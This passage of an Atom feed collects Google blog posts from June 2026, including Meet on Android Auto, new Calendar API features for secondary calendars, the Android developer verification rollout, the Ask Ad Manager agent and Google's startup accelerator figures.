href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqwfXW60WqmKu3IURP_qPocQoRxbBlAsvOcbR69nLhyphenhyphenp9GSRZ_ijxxSPl-G8K-kOSjoLSpQc6fwm0t0e2W4muHu-YxjVuk7P7b522AD-9RtUYehdlBfDlUGKK4j26y5HYNUceUuNQhdw_1Ik0MCLe8BjQqD7x-OsK8sFngZYmiC_b5-lU9Nl4yrzqOab0E/s1919/Android%20Auto%202.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="User interface showing recent calls" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqwfXW60WqmKu3IURP_qPocQoRxbBlAsvOcbR69nLhyphenhyphenp9GSRZ_ijxxSPl-G8K-kOSjoLSpQc6fwm0t0e2W4muHu-YxjVuk7P7b522AD-9RtUYehdlBfDlUGKK4j26y5HYNUceUuNQhdw_1Ik0MCLe8BjQqD7x-OsK8sFngZYmiC_b5-lU9Nl4yrzqOab0E/s16000/Android%20Auto%202.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Please note that when you join a meeting or call, your camera is turned off and you won’t see the incoming video content. You’ll hear the audio from the meeting and have audio input access from your microphone.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;There is no admin control for this feature.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;This feature is ON by default for users with the Google Meet app installed on their Android phone. To use it, simply connect your phone to an Android Auto-compatible vehicle. Visit the Help Center to &lt;a href="https://support.google.com/meet/answer/16920905" target="_blank"&gt;learn more about using Meet on Android Auto&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release domains&lt;/a&gt;: Available now&lt;/li&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Scheduled Release domains&lt;/a&gt;: Rolling out now, with expected completion by June 26, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers, Workspace Individual subscribers, and users with personal Google accounts&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Meet Help: &lt;a href="https://support.google.com/meet/answer/16920905" target="_blank"&gt;Use Meet on Android Auto&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Updates Blog: &lt;a href="https://workspaceupdates.googleblog.com/2026/04/google-meet-is-now-available-on-carplay.html" target="_blank"&gt;Google Meet is now available on CarPlay&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="http://workspaceupdates.googleblog.com/2026/06/google-meet-now-available-on-android.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-18T14:43:23+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/secondary-calendar-management-API.html</id>
    <title>Improved management of secondary calendars via the Calendar API</title>
    <updated>2026-06-18T14:17:37+00:00</updated>
    <content type="html">We’re introducing two enhancements to the Calendar API that make it easier for admins to programmatically manage secondary calendars within their organization: a transfer API and a filter for secondary calendars owned by your organization.&lt;h4 style="text-align: left;"&gt;&lt;b&gt;Transfer API&lt;/b&gt;&lt;/h4&gt;&lt;div&gt;As &lt;a href="https://workspaceupdates.googleblog.com/2026/03/an-update-on-secondary-calendar-lifecycle-changes-and-a-new-API.html" target="_blank"&gt;previously announced&lt;/a&gt;, the new endpoint in the Google Calendar API that allows administrators to programmatically transfer the ownership of secondary calendars is now being rolled out. Its functionality mirrors the &lt;a href="https://knowledge.workspace.google.com/admin/calendar/cancel-or-transfer-events-or-secondary-calendars-before-deleting-a-user" target="_blank"&gt;data transfer feature currently available in the Admin console&lt;/a&gt; by permitting transfers between users in the same organization without sending emails or requiring confirmation from the recipient. Beyond replicating the Admin console functionality, the API provides greater flexibility by allowing administrators to transfer specific, individual secondary calendars.&lt;/div&gt;&lt;h4 style="text-align: left;"&gt;&lt;b&gt;Organization filter&lt;/b&gt;&lt;/h4&gt;&lt;div&gt;To help organizations prepare for the upcoming secondary calendar data lifecycle changes, where secondary calendars will follow the lifecycle of their owner, administrators can now programmatically monitor the ownership status of their users' secondary calendars.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;A new filtering option will be available in the &lt;a href="https://developers.google.com/workspace/calendar/api/v3/reference/calendarList/list" target="_blank"&gt;CalendarList:list API method&lt;/a&gt; that restricts results to return only secondary calendars owned by the organization. When combined with the &lt;a href="https://developers.google.com/workspace/admin/directory/reference/rest/v1/users/list" target="_blank"&gt;users.list method&lt;/a&gt; of the Admin SDK API, administrators can retrieve a comprehensive list of organization-owned secondary calendars across their users' calendar lists. The &lt;a href="https://developers.google.com/workspace/calendar/api/v3/reference/calendars#dataOwner" target="_blank"&gt;dataOwner field&lt;/a&gt; can then be used to verify current ownership status and make any necessary adjustments.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins:&lt;/b&gt; There is no admin control for this feature.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users:&lt;/b&gt; There is no end user setting for this feature. Visit the Help Center to &lt;a href="https://support.google.com/calendar/answer/78739" target="_blank"&gt;learn more about transferring calendars or events in Google Calendar&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;b&gt;Transfer API&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains&lt;/a&gt;: Gradual rollout (up to 15 days for feature visibility) starting on June 18, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Organization filter&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains&lt;/a&gt;: Gradual rollout (up to 15 days for feature visibility) starting on July 6, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/admin/calendar/cancel-or-transfer-events-or-secondary-calendars-before-deleting-a-user" target="_blank"&gt;Cancel or transfer events or secondary calendars before deleting a user&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Calendar Help: &lt;a href="https://support.google.com/calendar/answer/78739" target="_blank"&gt;Transfer calendars or events in Google Calendar&amp;nbsp;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Workspace Updates Blog: &lt;a href="https://workspaceupdates.googleblog.com/2026/03/an-update-on-secondary-calendar-lifecycle-changes-and-a-new-API.html" target="_blank"&gt;An update on secondary calendar lifecycle changes and a new API&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/secondary-calendar-management-API.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-18T14:17:37+00:00</published>
  </entry>
  <entry>
    <id>http://workspaceupdates.googleblog.com/2026/06/secondary-calendar-management-API.html</id>
    <title>Improved management of secondary calendars via the Calendar API</title>
    <updated>2026-06-18T14:17:37+00:00</updated>
    <content type="html">We’re introducing two enhancements to the Calendar API that make it easier for admins to programmatically manage secondary calendars within their organization: a transfer API and a filter for secondary calendars owned by your organization.&lt;h4 style="text-align: left;"&gt;&lt;b&gt;Transfer API&lt;/b&gt;&lt;/h4&gt;&lt;div&gt;As &lt;a href="https://workspaceupdates.googleblog.com/2026/03/an-update-on-secondary-calendar-lifecycle-changes-and-a-new-API.html" target="_blank"&gt;previously announced&lt;/a&gt;, the new endpoint in the Google Calendar API that allows administrators to programmatically transfer the ownership of secondary calendars is now being rolled out. Its functionality mirrors the &lt;a href="https://knowledge.workspace.google.com/admin/calendar/cancel-or-transfer-events-or-secondary-calendars-before-deleting-a-user" target="_blank"&gt;data transfer feature currently available in the Admin console&lt;/a&gt; by permitting transfers between users in the same organization without sending emails or requiring confirmation from the recipient. Beyond replicating the Admin console functionality, the API provides greater flexibility by allowing administrators to transfer specific, individual secondary calendars.&lt;/div&gt;&lt;h4 style="text-align: left;"&gt;&lt;b&gt;Organization filter&lt;/b&gt;&lt;/h4&gt;&lt;div&gt;To help organizations prepare for the upcoming secondary calendar data lifecycle changes, where secondary calendars will follow the lifecycle of their owner, administrators can now programmatically monitor the ownership status of their users' secondary calendars.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;A new filtering option will be available in the &lt;a href="https://developers.google.com/workspace/calendar/api/v3/reference/calendarList/list" target="_blank"&gt;CalendarList:list API method&lt;/a&gt; that restricts results to return only secondary calendars owned by the organization. When combined with the &lt;a href="https://developers.google.com/workspace/admin/directory/reference/rest/v1/users/list" target="_blank"&gt;users.list method&lt;/a&gt; of the Admin SDK API, administrators can retrieve a comprehensive list of organization-owned secondary calendars across their users' calendar lists. The &lt;a href="https://developers.google.com/workspace/calendar/api/v3/reference/calendars#dataOwner" target="_blank"&gt;dataOwner field&lt;/a&gt; can then be used to verify current ownership status and make any necessary adjustments.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins:&lt;/b&gt; There is no admin control for this feature.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users:&lt;/b&gt; There is no end user setting for this feature. Visit the Help Center to &lt;a href="https://support.google.com/calendar/answer/78739" target="_blank"&gt;learn more about transferring calendars or events in Google Calendar&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;b&gt;Transfer API&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains&lt;/a&gt;: Gradual rollout (up to 15 days for feature visibility) starting on June 18, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Organization filter&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains&lt;/a&gt;: Gradual rollout (up to 15 days for feature visibility) starting on July 6, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/admin/calendar/cancel-or-transfer-events-or-secondary-calendars-before-deleting-a-user" target="_blank"&gt;Cancel or transfer events or secondary calendars before deleting a user&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Calendar Help: &lt;a href="https://support.google.com/calendar/answer/78739" target="_blank"&gt;Transfer calendars or events in Google Calendar&amp;nbsp;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Workspace Updates Blog: &lt;a href="https://workspaceupdates.googleblog.com/2026/03/an-update-on-secondary-calendar-lifecycle-changes-and-a-new-API.html" target="_blank"&gt;An update on secondary calendar lifecycle changes and a new API&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="http://workspaceupdates.googleblog.com/2026/06/secondary-calendar-management-API.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-18T14:17:37+00:00</published>
  </entry>
  <entry>
    <id>https://android-developers.googleblog.com/2026/06/android-developer-verification.html</id>
    <title>Android developer verification: Building a safer ecosystem together</title>
    <updated>2026-06-18T14:00:00+00:00</updated>
    <content type="html">&lt;img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2JeeSz9AeQDASycrf2ssGmJn2yQGvGFjyU29jKSs5hFtYySX9X5wDw4Pb63DF3co77osfiLeYj6LGt-_1v66X3svzCOdWAZz3w9Q2WKF28T4qZ4tCbiTEsP88lIZ44Ua6mLfg6VIQL_k3PVWlU4vDnJkTc9mJkdz188lH-smTL3oA47Yongl1w8sf4RY/s1235/260317_ADV%20Blog_Metadata.png" style="display: none;" /&gt;&lt;div&gt;&lt;i&gt;Posted by Matthew Forsythe, Director Product Management, Android App Safety&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4_MWnkCTsO9zdnVQqFu2Aep5Q_GMvQvuXoGn-H_LXNpOYIVYFqbHi0R0iKpChOEJ-GB0p_7fLCiK_IGETshue4Fjd3tjyg95M3i92-DzdZpND5GPhr9jeBuj620YHAhPJ6CLdDXD8jsA1XyyYiBCS4p4eoZizZnA0DHKpwJqDUq-agwXl_GbtLrKdM5Y/s4210/260317_ADV%20Blog_Header.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4_MWnkCTsO9zdnVQqFu2Aep5Q_GMvQvuXoGn-H_LXNpOYIVYFqbHi0R0iKpChOEJ-GB0p_7fLCiK_IGETshue4Fjd3tjyg95M3i92-DzdZpND5GPhr9jeBuj620YHAhPJ6CLdDXD8jsA1XyyYiBCS4p4eoZizZnA0DHKpwJqDUq-agwXl_GbtLrKdM5Y/s16000/260317_ADV%20Blog_Header.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Last year, we introduced &lt;a href="https://developer.android.com/developer-verification"&gt;Android developer verification&lt;/a&gt; to strengthen ecosystem security and stop malicious actors from hiding behind anonymity to release harmful apps. Millions of apps have been registered since the verification launched in March, covering nearly all installs on Google Play and a large majority of installs from outside of Google Play. We appreciate the feedback and partnership from industry leaders, developers, and Android communities that helped us design this experience and drive strong adoption.&lt;h2 style="margin-top: 12px;"&gt;Initial launch across seven stores and four countries&lt;/h2&gt;

&lt;p&gt;These new developer verification protections will take effect on September 30, 2026, starting with users in Brazil, Indonesia, Singapore, and Thailand.&lt;/p&gt;

&lt;p&gt;This rollout is an &lt;b&gt;industry-wide effort to create a safer ecosystem&lt;/b&gt;. We will begin by verifying app installations from the following stores:&lt;/p&gt;

&lt;ul&gt;
    &lt;li&gt;Google (Google Play)&lt;/li&gt;
    &lt;li&gt;Honor (HONOR App Market)&lt;/li&gt;
    &lt;li&gt;OPlus (OPPO App Market)&lt;/li&gt;
    &lt;li&gt;Samsung (Galaxy Store)&lt;/li&gt;
    &lt;li&gt;Transsion (Palm Store)&lt;/li&gt;
    &lt;li&gt;vivo (V-Appstore)&lt;/li&gt;
    &lt;li&gt;Xiaomi (GetApps)&lt;/li&gt;
&lt;/ul&gt;

&lt;p style="margin-bottom: 4px;"&gt;Following this initial phase with our partners, we will expand these protections globally for all apps on certified Android devices in 2027.&lt;/p&gt;&lt;h2 style="margin-top: 12px;"&gt;Automate your workflow with new APIs&lt;/h2&gt;

&lt;p&gt;To further streamline app registration, we are&lt;b&gt; launching a suite of developer-requested APIs&lt;/b&gt; to help you register apps in bulk or directly through your continuous integration and deployment (CI/CD) pipelines. The Android Developer ID Status API will let you check if a package name has already been registered, and the Android Developer Console API will let you register and manage package names directly within your development environment. Both APIs also support OAuth delegation, allowing third-party platforms, like Android app stores, to perform these operations natively on your behalf.&lt;/p&gt;

We'll launch these APIs over the next few months.&lt;h2 style="margin-top: 12px;"&gt;What’s next&lt;/h2&gt;

&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;strong&gt;June 2026:&lt;/strong&gt; Starting this month, we are rolling out a new &lt;a href="https://support.google.com/android/answer/17065026"&gt;system service&lt;/a&gt; that will be automatically installed on most Android devices. This service will be used later this year to verify developer registration.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;July 2026:&lt;/strong&gt; We’ll launch the Android Developer ID Status API globally and begin early access for the Android Developer Console API. Early access also starts for &lt;a href="https://developer.android.com/developer-verification/guides/limited-distribution"&gt;limited distribution accounts&lt;/a&gt; on Android Developer Console. This new type of Android developer account is designed for students, hobbyists, and learners and lets you share your apps to up to 20 devices without a government-issued ID or a fee.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;August 2026:&lt;/strong&gt;&amp;nbsp;Limited distribution accounts and the new Android Developer Console API will launch globally. We’ll also launch an &lt;a href="https://android-developers.googleblog.com/2026/03/android-developer-verification.html"&gt;advanced flow&lt;/a&gt; for installing apps from unverified developers, which includes security checkpoints to resist coercion scams, while allowing power users to maintain the ability to &lt;a href="https://developer.android.com/developer-verification/guides/faq#sideload-apps"&gt;sideload apps&lt;/a&gt; from unverified developers.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;September 30, 2026:&lt;/strong&gt; App registration becomes required for &lt;b&gt;participating stores in Brazil, Indonesia, Singapore, and Thailand&lt;/b&gt;. Unregistered apps can be sideloaded with Android Debug Bridge (adb) or advanced flow.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;2027 and beyond:&lt;/strong&gt; After incorporating the feedback from our partners, users, and developer community, we’ll expand the Android verification requirement globally.&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqbV_ekgsQfaIaR1t9bIoK0tVlU7VyWBaOKR6mw42w9zgqNhHrRYoinUTD6SnSShwSgz1dRjSQ8XexLH1Ob3fmxB-rTihARv4BM7n_fJ3fOeM51zmd9uvRgc1O4vy6pbL99X9crg4ioiyGoHdKY6mm-LXpYHZwWGPE8yGZcOoRsBJgdUK5WNGVlZDf40I/s960/260604_Blog%20in%20line%20asset%20-%20%E2%80%9CADV%20June%E2%80%9D.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqbV_ekgsQfaIaR1t9bIoK0tVlU7VyWBaOKR6mw42w9zgqNhHrRYoinUTD6SnSShwSgz1dRjSQ8XexLH1Ob3fmxB-rTihARv4BM7n_fJ3fOeM51zmd9uvRgc1O4vy6pbL99X9crg4ioiyGoHdKY6mm-LXpYHZwWGPE8yGZcOoRsBJgdUK5WNGVlZDf40I/s16000/260604_Blog%20in%20line%20asset%20-%20%E2%80%9CADV%20June%E2%80%9D.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h2 style="margin-top: 12px;"&gt;Get started with Android Developer Verification&lt;/h2&gt;

&lt;p&gt;If you distribute apps in Brazil, Indonesia, Singapore, or Thailand via the stores listed above, please ensure your verification is complete by the September deadline.&lt;/p&gt;

&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;strong&gt;Google Play developers:&lt;/strong&gt; Most Play developers are already verified, and over 99% of their apps have been registered. Go to your &lt;a href="https://play.google.com/console/developers/app-list"&gt;Play Console Home page&lt;/a&gt; to see your app’s verification status, and &lt;a href="https://support.google.com/googleplay/android-developer/answer/16984799"&gt;register apps&lt;/a&gt; you want to continue distributing that weren't automatically registered.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Developers who distribute only outside of Google Play:&lt;/strong&gt;&amp;nbsp;Sign up for the &lt;a href="https://android.google.com/developerconsole/developers"&gt;Android Developer Console&lt;/a&gt; today to register your apps.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;



&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;ul&gt;&lt;li&gt;&lt;strong&gt;Students and hobbyists:&lt;/strong&gt;&amp;nbsp;Sign up &lt;a href="https://google.qualtrics.com/jfe/form/SV_4N7NGE06NjJJdl4"&gt;here&lt;/a&gt; for early access to limited distribution accounts to help us refine the feature with your feedback.&lt;/li&gt;&lt;/ul&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;

Thank you for helping us build a safer Android ecosystem. Stay tuned for more updates as we approach September and the 2027 global rollout.</content>
    <link href="https://android-developers.googleblog.com/2026/06/android-developer-verification.html" rel="alternate"/>
    <category term="Android Developers"/>
    <published>2026-06-18T14:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products/admanager/ask-ad-manager/</id>
    <title>Introducing Ask Ad Manager, the AI agent that will help you get more done</title>
    <updated>2026-06-18T13:00:00+00:00</updated>
    <content type="html">An animated sequence on a white background introducing "Agentic AI in Google Ad Manager". The animation transitions to show a blue magnifying glass paired with a spark icon, accompanied by the black text "Ask Ad Manager.”</content>
    <link href="https://blog.google/products/admanager/ask-ad-manager/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-18T13:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/developers-practitioners/scaling-the-next-generation-of-global-innovation-how-google-supports-top-startups-around-the-world</id>
    <title>Scaling the Next Generation of Global Innovation: How Google Supports Top Startups Around the World</title>
    <updated>2026-06-18T12:51:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In the high-stakes world of tech entrepreneurship, the leap from a brilliant prototype to a scalable, market-defining business can be brutal. Founders need much more than capital; they need deep architectural guidance, sovereign-level policy alignment, and technical systems engineered to enable rapid growth. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="font-style: italic; vertical-align: baseline;"&gt;Joy’s Law&lt;/strong&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;strong style="font-style: italic; vertical-align: baseline;"&gt;states: &lt;/strong&gt;&lt;strong style="font-style: italic; vertical-align: baseline;"&gt;"[N]o matter who you are, most of the smartest people work for someone else."&lt;/strong&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We recognize that true innovation inherently happens &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;“elsewhere.”&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; This philosophy drives our active support of global accelerators across a diverse, geographic footprint of innovation markets to tap into this decentralized brilliance. For over a decade, our Google accelerator program has acted as a catalyst for this exact transition. By bridging the gap between raw entrepreneurial ambition and Google’s world-class engineering ecosystem, the program has quietly built one of the most resilient, high-performing startup portfolios on Earth.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;The Power of the Network: A Decade by the Numbers&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While many startup accelerators struggle with significant failure rates, our accelerator program has set a high bar for long-term success. By pairing top-tier founders and CTOs with customized, deeply technical engagement from Google, along with learned industry best practices, the program has consistently helped build both highly valuable companies and products. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The scope of this global network is impressive:&lt;/span&gt;&lt;/p&gt;
&lt;p&gt; &lt;/p&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table border="1" style="border-collapse: collapse; width: 99.7931%; height: 335px;"&gt;
&lt;tbody&gt;
&lt;tr style="height: 33.9702px;"&gt;
&lt;td style="width: 28.304%; height: 33.9702px;"&gt;&lt;em&gt;&lt;strong&gt;Metric&lt;/strong&gt;&lt;/em&gt;&lt;/td&gt;
&lt;td style="width: 71.6829%; height: 33.9702px; text-align: left;"&gt;&lt;em&gt;&lt;strong&gt;Impact to Date&lt;/strong&gt;&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 33.9702px;"&gt;
&lt;td style="width: 28.304%; height: 33.9702px;"&gt;&lt;strong style="font-style: italic; vertical-align: baseline;"&gt;Global Footprint&lt;/strong&gt;&lt;/td&gt;
&lt;td style="width: 71.6829%; height: 33.9702px;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;2,011&lt;/strong&gt; startups supported across 88 countries&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 33.9702px;"&gt;
&lt;td style="width: 28.304%; height: 33.9702px;"&gt;&lt;strong style="font-style: italic; vertical-align: baseline;"&gt;Program Experience&lt;/strong&gt;&lt;/td&gt;
&lt;td style="width: 71.6829%; height: 33.9702px;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;144&lt;/strong&gt; cohorts graduated over 10 years&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 33.9702px;"&gt;
&lt;td style="width: 28.304%; height: 33.9702px;"&gt;&lt;strong style="font-style: italic; vertical-align: baseline;"&gt;Survival Rate&lt;/strong&gt;&lt;/td&gt;
&lt;td style="width: 71.6829%; height: 33.9702px;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;93%&lt;/strong&gt; portfolio survival rate&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 33.9702px;"&gt;
&lt;td style="width: 28.304%; height: 33.9702px;"&gt;&lt;strong style="font-style: italic; vertical-align: baseline;"&gt;Financial Momentum&lt;/strong&gt;&lt;/td&gt;
&lt;td style="width: 71.6829%; height: 33.9702px;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;$46.3B &lt;/strong&gt;in funding raised; $135.1B collective portfolio valuation&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style="height: 33.9915px;"&gt;
&lt;td style="width: 28.304%; height: 33.9915px;"&gt;&lt;strong style="font-style: italic; vertical-align: baseline;"&gt;Startup Job Creation&lt;/strong&gt;&lt;/td&gt;
&lt;td style="width: 71.6829%; height: 33.9915px;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;305,900 &lt;/strong&gt;employees across the entire startup portfolio&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt; &lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;The Developer Value-Add:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; By design, this isn't a high-level business bootcamp. The founders of Accelerator startups identify a deeply technical problem that they then work on with bespoke support from Google to solve. These startups get access to Google engineers and product managers, along with access to our platforms and tools. From advising on architectures to optimizing AI model pipelines, Google experts work directly with the founding teams to help tackle some of their most complex technical hurdles.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Strategic Momentum: Geopolitics, Green Infrastructure, and Robotics&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The startup ecosystem is shifting rapidly, and our accelerator program is evolving along with it. This year, Google launched new initiatives  to support global economic development and explore and evolve critical environmental infrastructure. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Just a few examples:&lt;/span&gt;&lt;/p&gt;
